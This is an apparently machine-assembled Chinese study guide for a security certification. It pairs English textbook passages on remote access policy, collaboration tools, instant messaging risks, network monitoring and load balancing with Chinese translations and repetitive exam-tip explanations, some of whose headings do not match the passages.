本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

虚拟专用网络 VPN:VPN 在不可信网络上建立加密隧道。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
身份 身份是主体在系统中的标识。
学习单元 16 / PDF P853

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

compromise, or disclosure. Remote systems might be exposed to malicious code and could be used as a carrier to bring malware into the private LAN. Remote systems might be less physically secure and thus at risk of being used by unauthorized entities or stolen. Remote systems might be more difficult to troubleshoot, especially if the issues revolve around a remote connection. Remote systems might not be as easy to upgrade or patch due to their potential infrequent connections or slow throughput links. However, this issue is lessened when high-speed, reliable broadband links are present.

These issues, and likely others, need to be considered, and a remote access security policy needs to be established. Plan a Remote Access Security Policy When outlining your remote access security management strategy, be sure to address the following issues in the policy: Remote Connectivity Technology Each type of connection has its own unique security issues. Fully examine every aspect of your connection options. This can include cellular/mobile services, PSTN modems, cable TV Internet services, Digital Subscriber Line (DSL), fiber connections, wireless networking, and satellite.

Transmission Protection There are several forms of encrypted protocols, encrypted connection systems, and encrypted network services or applications. Use the appropriate combination of secured services for your remote connectivity needs. This can include VPNs and/or TLS. Authentication Protection In addition to protecting data traffic, you must ensure that all logon credentials are properly secured. This requires the use of a secure authentication protocol, may mandate the use of a centralized remote access authentication system, and should require multifactor authentication. Remote User Assistance Remote access users may periodically require technical assistance.

You must have a means established to provide this as efficiently as possible. This can include, for example, addressing software and hardware issues and user training issues. If an organization is unable to

中文直译 / 整理

泄露或被破坏。 远程系统可能暴露于恶意代码中,并可能被用作将恶意软件引入私有局域网 的载体。 远程系统可能物理安全性较低,因此面临被未经授权的实体使用或被盗的风险。 远程系统可能更难以排查故障,尤其是当问题涉及远程连接时。 由于远程系统可能连接不频繁或带宽较低,因此升级或打补丁可能不如本地系 统容易。 然而,当存在高速、可靠的宽带连接时,这一问题会得到缓解。 这些问题以及可能的其他问题都需要加以考虑,并制定远程访问安全策略。 制定远程访问安全策略 在制定远程访问安全管理策略时,请务必在政策中涵盖以下问题: 远程连接技术 每种连接类型都有其独特的安全问题。 请全面审查您的所有连接 选项。 这可能包括蜂窝/移动服务、PSTN调制解调器、有线电视互联网服务、 数字用户线路(DSL)、光纤连接、无线网络和卫星。 传输保护 存在多种加密协议、加密连接系统以及加密网络服务或应用程序。 请根 据您的远程连接需求,选择合适的加密服务组合。 这可能包括VPN和/或TLS。 身份验证保护 除了保护数据流量外,您还必须确保所有登录凭据得到妥善保护。

这需要使用安全的身份验证协议,可能要求使用集中式远程访问身份验证系统, 并应要求采用多因素身份验证。 远程用户协助远程访问用户可能需要定期获得技术支持。 您必须建立一种有效的 方式提供此类支持。 这可以包括,例如,解决软件和硬件问题以及用户培训问题。 如果组织无法

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 17 / PDF P854

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

provide a reasonable solution for remote user technical support, it could result in a loss of productivity, compromise of the remote system, or an overall breach of organizational security. If it is difficult or impossible to maintain a similar level of security on a remote system as is maintained in the private LAN, then remote access should be reconsidered in light of the security risks it represents. Network access control (NAC) can assist with this but may burden slower connections with large updates and patch transfers. The ability to use remote access or establish a remote connection should be tightly controlled.

You can control and restrict the use of remote connectivity by means of filters, rules, or access controls based on user identity, workstation identity, protocol, application, content, and time of day. (See attribute-based access control [ABAC] in Chapter 14.) It should be a standard element in your security policy that no unauthorized modems be present on any system connected to the private network. You may need to specify this policy further by indicating that those with portable systems must either remove their modems before connecting to the network or boot with a hardware profile that disables the modem's device driver.

This is the same prohibition concept that should be applied to secondary connection options of all types, including wireless and cellular. Network Administrative Functions Remote access does not need to focus exclusively on general workers for telecommuting. Remote access can also be an essential tool of administrators for the operation of network administrative functions. Network administrative functions encompass a range of tasks and capabilities that administrators perform to manage and control network resources from locations outside the physical infrastructure. These functions are vital for optimizing network performance, ensuring security, and responding to evolving requirements.

Configuration management is a key aspect, allowing administrators to remotely configure and modify network devices such as routers, switches, and firewalls. This involves adjusting settings, updating configurations, and implementing changes to meet the network's needs. Monitoring and analysis are facilitated through remote access, enabling administrators to track network performance, analyze traffic patterns, and

中文直译 / 整理

为远程用户技术支持提供合理的解决方案,可能导致生产力下降、远程系 统被破坏,或组织安全整体被 breached。 如果在远程系统上无法或不可能维持与私有局域网相同的安全部署水平,则应 根据其带来的安全风险重新考虑远程访问。 网络访问控制(NAC)可以帮助实 现这一点,但可能会因大型更新和补丁传输而加重慢速连接的负担。 使用远程访问或建立远程连接的能力应受到严格控制。 您可以通过基于用户身 份、工作站身份、协议、应用程序、内容和一天中的时间的过滤器、规则或访 问控制来管理和限制远程连接的使用。 (参见基于属性的访问控制 [ABAC] 在 第14章。 ) 您的安全策略中应明确规定,任何连接到私有网络的系统上均不得存在未经授 权的调制解调器。 您可能需要进一步明确此策略,规定携带便携式系统的用户 在连接到网络前必须移除其调制解调器,或使用禁用调制解调器设备驱动程序 的硬件配置文件启动。 这一禁令概念同样适用于所有类型的其他连接选项,包 括无线和蜂窝网络。 网络管理功能 远程访问并不需要仅关注远程办公的普通员工。 远程访问也可以是管理员执行 网络管理功能的重要工具。

网络管理功能涵盖了一系列管理员在物理基础设施 之外管理和控制网络资源所执行的任务和能力。 这些功能对于优化网络性能、 确保安全性以及应对不断变化的需求至关重要。 配置管理是一个关键方面,允许管理员远程配置和修改路由器、交换机和防 火墙等网络设备。 这包括调整设置、更新配置以及实施变更以满足网络需求。 通过远程访问促进监控和分析,使管理员能够跟踪网络性能、分析流量模式, 并

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
身份 身份是主体在系统中的标识。
基于属性的访问控制 ABAC ABAC 根据用户、资源、环境等属性动态决策。
学习单元 18 / PDF P855

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

identify potential issues or security threats. Remote monitoring tools help monitor network metrics, analyze logs, and respond to alerts to ensure network health. Troubleshooting and diagnostics benefit from remote access, as administrators can diagnose and address network issues from a remote location. This includes accessing devices, running diagnostic tests, analyzing logs, and implementing solutions to resolve connectivity or performance problems. Security management involves configuring security policies, access controls, and authentication mechanisms remotely to protect the network.

Administrators can manage firewalls, VPNs, and other security measures to safeguard the network infrastructure. User account management is streamlined with remote access, allowing administrators to create, modify, or deactivate user accounts, reset passwords, and control access rights to network resources. Software updates and patch management can be performed remotely, with administrators deploying updates, patches, and security fixes to network devices and servers. This helps address vulnerabilities and ensures that the network operates with the latest features and security enhancements.

Backup and recovery tasks are facilitated through remote access, enabling administrators to schedule remote backups, verify data integrity, and implement recovery procedures in case of data loss or system failures. Policy enforcement involves administrators ensuring that network configurations align with organizational policies, security standards, and industry regulations. This is done remotely to enforce compliance and maintain a secure network environment.

Remote access network administrative functions are essential for maintaining operational efficiency, responding to issues promptly, and ensuring the overall health and security of network infrastructure, especially in scenarios where physical presence at the network site is not feasible. Any and all remote access-based administrative functions and their necessary security requirements should be defined in an organizational security policy. Multimedia Collaboration

中文直译 / 整理

识别潜在问题或安全威胁。 远程监控工具有助于监控网络指标、分析日志并 响应警报,以确保网络健康。 故障排除和诊断得益于远程访问,管理员可以从远程位置诊断和解决网络问题。 这包括访问设备、运行诊断测试、分析日志以及实施解决方案以解决连接或性 能问题。 安全管理涉及远程配置安全策略、访问控制和身份验证机制,以保护网络。 管理员可以管理防火墙、VPN 和其他安全措施,以保护网络基础设施。 远程访问简化了用户账户管理,管理员可以创建、修改或停用用户账户, 重置密码,并控制对网络资源的访问权限。 软件更新和补丁管理可以通过远程访问执行,管理员可以向网络设备和服务 器部署更新、补丁和安全修复程序。 这有助于解决漏洞,并确保网络使用最 新的功能和安全增强功能。 通过远程访问可以方便地执行备份和恢复任务,管理员可以安排远程备份、 验证数据完整性,并在数据丢失或系统故障时实施恢复程序。 策略执行涉及管理员远程确保网络配置符合组织政策、安全标准和行业法 规,以强制合规并维护安全的网络环境。 远程访问网络管理功能对于保持运营效率、及时响应问题以及确保网络基础设 施的整体健康与安全至关重要,尤其是在无法实地到达网络站点的情况下。

所 有基于远程访问的管理功能及其必要的安全要求都应在组织安全策略中明确界 定。 多媒体协作

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

认证:认证是验证“你是不是你声称的那个人”。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

密码、令牌、生物特征、多因素认证都服务认证。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
认证 认证是验证“你是不是你声称的那个人”。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
学习单元 19 / PDF P856

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Multimedia collaboration is the use of various multimedia-supporting communication solutions to enhance distance collaboration (people working on a project together remotely). Often, collaboration allows workers to work simultaneously as well as across different time frames. Collaboration can also be used to track changes and include multimedia functions. Collaboration can incorporate email, chat, voice/VoIP, video/video conferencing, use of a whiteboard, online document editing, real-time file exchange, versioning control, and other tools. It is often a feature of advanced forms of remote meeting technology.

Whatever SaaS service is implemented to support multimedia collaboration, it is essential that it be thoroughly reviewed against the organization's security policy. Just because someone is working remotely does not mean that security should be relaxed. It is important to verify that connections are encrypted, that robust multifactor authentication is in use, and that tracking is available for the hosting organization to review. One means to support remote access and collaboration activities is through the use of online conferencing solutions.

One such product is Zoom, which gained extreme popularity in 2020 due to the pandemic lockdowns that resulted in many employees needing to continue working from home. Zoom is only one of several video conferencing products available. Now that many employees have returned to the office, there is still a significant need for online remote video conferencing and collaboration. Some organizations have established Zoom rooms. A Zoom room refers to a dedicated physical space equipped with audio-visual and communication technology designed for hosting video meetings, conferences, and collaborations. A Zoom room is set up to enhance the quality and experience of online video collaboration meetings.

They often include larger displays, high-quality camera and microphone equipment, a quality sound system, touchscreen system/room controls, lighting controls, and other smart technologies. The concept of a Zoom room is part of the broader trend toward creating collaborative and technology-enabled meeting spaces within workplaces. It allows for a more immersive and effective collaboration experience during virtual meetings, particularly in settings where teams or groups gather for discussions, presentations, or remote interactions. Remote Meeting

中文直译 / 整理

多媒体协作 是指利用各种支持多媒体的通信解决方案来增强远程协作(人们异 地共同参与项目)。 通常,协作允许工作人员同时工作,或在不同时间段内协 同工作。 协作还可用于跟踪变更并集成多媒体功能。 协作可整合电子邮件、聊 天、语音/VoIP、视频/视频会议、白板使用、在线文档编辑、实时文件交换、 版本控制及其他工具。 它通常是高级远程会议技术的一项功能。 无论实施何种SaaS服务以支持多媒体协作,都必须将其与组织的安全策略进 行全面审查。 仅仅因为某人远程工作,并不意味着可以放松安全措施。 必须验 证连接是否已加密,是否启用了强大的多因素身份验证,以及托管组织是否能 够进行追踪和审查。 支持远程访问和协作活动的一种方式是通过在线会议解决方案。 其中一个产 品是Zoom,由于疫情封锁导致许多员工需要在家继续工作,Zoom在2020年 获得了极大的流行。 Zoom只是众多视频会议产品中的一个。 如今,许多员工已返回办公室,但对在线远程视频会议和协作的需求依然显著。 一些组织已设立了Zoom会议室。 Zoom会议室指的是配备音视频和通信技术 的专用物理空间,专为举办视频会议、会议和协作而设计。

Zoom会议室的设 置旨在提升在线视频协作会议的质量和体验。 它们通常包括更大的显示屏、高 质量的摄像头和麦克风设备、优质的音响系统、触摸屏系统/房间控制、照明 控制以及其他智能技术。 Zoom会议室的概念是工作场所中创建协作型和技术赋能会议空间这一更广 泛趋势的一部分。 它能够在虚拟会议中提供更加沉浸和高效的协作体验,尤 其适用于团队或群体进行讨论、演示或远程互动的场景。 远程会议

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

政策:政策是高层原则,说明必须遵守什么。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Policy 高层、强制、稳定;Procedure 具体步骤。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
政策 政策是高层原则,说明必须遵守什么。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 20 / PDF P857

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Remote meeting technology is used for any product, hardware, or software that allows for interaction between remote parties. These technologies and solutions are known by many other terms: digital collaboration, virtual meetings, videoconferencing, software or application collaboration, shared whiteboard services, virtual training solutions, and so on. Any service that enables people to communicate, exchange data, collaborate on materials/data/documents, and otherwise perform work tasks together can be considered a remote meeting technology service. No matter what form of multimedia collaboration is implemented, the attendant security implications must be evaluated.

There are many questions about security that need to be asked and satisfactory answers uncovered prior to deployment or use: Does the service use strong authentication techniques? Does the communication occur across an open protocol or an encrypted tunnel? Is the encryption just from the endpoint to the central server, or is it endto-end? Does the solution allow for true deletion of content? Are the activities of users audited and logged? Can unauthorized entities join in a private meeting? Can attendees interject into the meeting with voice, image, video, or file sharing? Does the platform integrate advertising/spam into the interface, and can it be disabled?

What tracking mechanisms are used, can the tracking be disabled, and what is the data collected for? Are sessions recorded? Who has access to the recordings? Can they be exported and distributed? Multimedia collaboration and other forms of remote meeting technology can improve the work environment and allow for input from a wider range of diverse workers across the globe, but this is a benefit only if the security of the communications solution can be ensured and personnel are trained to use it effectively and in compliance with company policy.

中文直译 / 整理

远程会议技术是指任何允许远程方之间进行互动的产品、硬件或软件。 这些 技术和解决方案还有许多其他名称:数字协作、虚拟会议、视频会议、软件 或应用程序协作、共享白板服务、虚拟培训解决方案等。 任何能够使人们进 行通信、交换数据、协作处理材料/数据/文档以及共同完成工作任务的服务, 均可视为远程会议技术服务平台。 无论实施何种形式的多媒体协作,都必须评估其伴随的安全影响。 在部署或使 用前,需要提出许多关于安全的问题并找到令人满意的答案: 该服务是否使用强身份验证技术? 通信是通过开放协议还是加密隧道进行的? 加密是从端点到中央服务器,还是端到端的? 该解决方案是否允许真正删除内容? 用户的活动是否被审计和记录? 未经授权的实体能否加入私人会议? 与会者能否通过语音、图像、视频或文件共享方式打断会议? 该平台是否在界面中集成广告/垃圾信息,且是否可以禁用? 使用了哪些跟踪机制? 能否禁用跟踪? 收集的数据用于什么目的? 会话是否被录制? 谁可以访问录制内容? 能否导出和分发?

多媒体协作及其他远程会议技术可以改善工作环境,并允许来自全球更多元化 的员工参与贡献,但这一优势只有在确保通信解决方案的安全性,并对人员进 行有效且符合公司政策的使用培训时才能实现。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
加密 加密把内容变成未授权者看不懂的形式。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 21 / PDF P858

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

Instant Messaging and Chat Instant messaging (IM), real-time messaging, or chat is a mechanism that allows for real-time text-based chat between two or more people located anywhere on the Internet. Some IM utilities allow for file transfer, multimedia, voice and videoconferencing, and more. Some forms of IM are based on a peer-to-peer service, whereas others use a centralized controlling server. Peer-to-peer-based IM and cloud-based IM systems are easy for end users to deploy and use, but it's difficult to manage from a corporate perspective because it may lack security or management controls.

Messaging systems and chat services usually have numerous vulnerabilities, such as being susceptible to packet sniffing/eavesdropping, lacking native security capabilities such as multifactor authentication and encryption, and providing little or no protection for privacy. Many stand-alone chat clients have been susceptible to malicious code deposits or infection through their file transfer capabilities. Also, chat users are often subject to numerous forms of social engineering attacks, such as impersonation or convincing a victim to reveal information that should remain confidential (such as passwords, PII, or intellectual property).

When selecting collaboration products, always consider the locus of control and the availability and effectiveness of security features, such as logging, multifactor authentication, and transmission encryption. Monitoring and Management Monitoring and management in the context of network operations involve various practices and tools aimed at ensuring the reliability, performance, and security of a network. Network observability, a key aspect, refers to the ability to gain insights into the internal state of a network by collecting and analyzing relevant data. This involves monitoring various metrics, logs, and traces to understand how the network components are performing.

The purpose is to enhance visibility into network behavior, detect issues, and gain actionable insights to optimize performance and troubleshoot problems. Another critical area is traffic flow/shaping, which involves managing the flow of data within a network to optimize performance, allocate resources efficiently, and ensure a consistent user experience. By shaping traffic, administrators can prioritize certain types of data, manage bandwidth usage, and control the flow of information to prevent congestion or bottlenecks.

中文直译 / 整理

即时消息与聊天 即时消息(IM)、实时消息或聊天是一种允许互联网上任意位置的两人或多人 进行实时文本交流的机制。 一些IM工具支持文件传输、多媒体、语音和视频会 议等功能。 某些IM形式基于点对点服务,而另一些则使用集中式控制服务器。 基于点对点的IM和基于云的IM系统便于终端用户部署和使用,但从企业角度 来看却难以管理,因为它们可能缺乏安全性和管理控制。 消息系统和聊天服务 通常存在诸多漏洞,例如容易遭受数据包嗅探/窃听、缺乏多因素身份验证和加 密等原生安全功能,以及几乎不提供隐私保护。 许多独立的聊天客户端因其文件传输功能而容易受到恶意代码注入或感染。 此外,聊天用户常常面临多种形式的社会工程攻击,例如冒充身份或诱使受 害者泄露本应保密的信息(如密码、个人身份信息或知识产权)。 在选择协作产品时,务必考虑控制权的归属以及安全功能的可用性和有效性, 例如日志记录、多因素身份验证和传输加密。 监控与管理 在网络运营的背景下,监控与管理涉及多种实践和工具,旨在确保网络的可靠 性、性能和安全性。 网络可观测性是其中的关键方面,指通过收集和分析相关 数据来洞察网络内部状态的能力。

这包括监控各种指标、日志和追踪数据,以 了解网络组件的运行情况。 其目的是增强对网络行为的可见性,检测问题,并 获得可操作的洞察,以优化性能和排查故障。 另一个关键领域是流量控制/整形,它涉及管理网络内的数据流,以优化性能、 高效分配资源并确保一致的用户体验。 通过整形流量,管理员可以优先处理特 定类型的数据,管理带宽使用,并控制信息流以防止拥塞或瓶颈。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 22 / PDF P859

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Capacity management is the practice of planning, monitoring, and optimizing the network's capacity to ensure it can handle current and future demands effectively. By monitoring resource usage and predicting future needs, administrators can allocate resources appropriately, prevent performance degradation, and ensure scalability. Fault detection and handling involve identifying and addressing issues, errors, or failures within the network. The goal is to detect problems as soon as possible, minimize downtime, and implement strategies for fault tolerance and resilience. Automated alerts and notifications can aid in a prompt response to faults.

Monitoring and management in networking encompass practices related to network observability, traffic flow/shaping, capacity management, and fault detection and handling. These practices collectively contribute to maintaining a healthy and efficient network infrastructure, ensuring that it meets performance expectations, is resilient to faults, and can adapt to changing demands. Advanced tools and technologies, such as network monitoring software, traffic shaping mechanisms, and predictive analytics, play a crucial role in implementing effective monitoring and management strategies in modern network environments.

Load Balancing The purpose of load balancing is to obtain more optimal infrastructure utilization, minimize response time, maximize throughput, reduce overloading, and eliminate bottlenecks. A load balancer is used to spread or distribute network traffic load across several network links or network devices. Although load balancing can be used in a variety of situations, a common implementation is spreading a load across multiple members of a server farm or cluster. Scheduling or load-balancing methods are the means by which a load balancer distributes the work, requests, or loads among the devices behind it.

A load balancer might use a variety of scheduling techniques to perform load distribution, as described in Table 12.1.

中文直译 / 整理

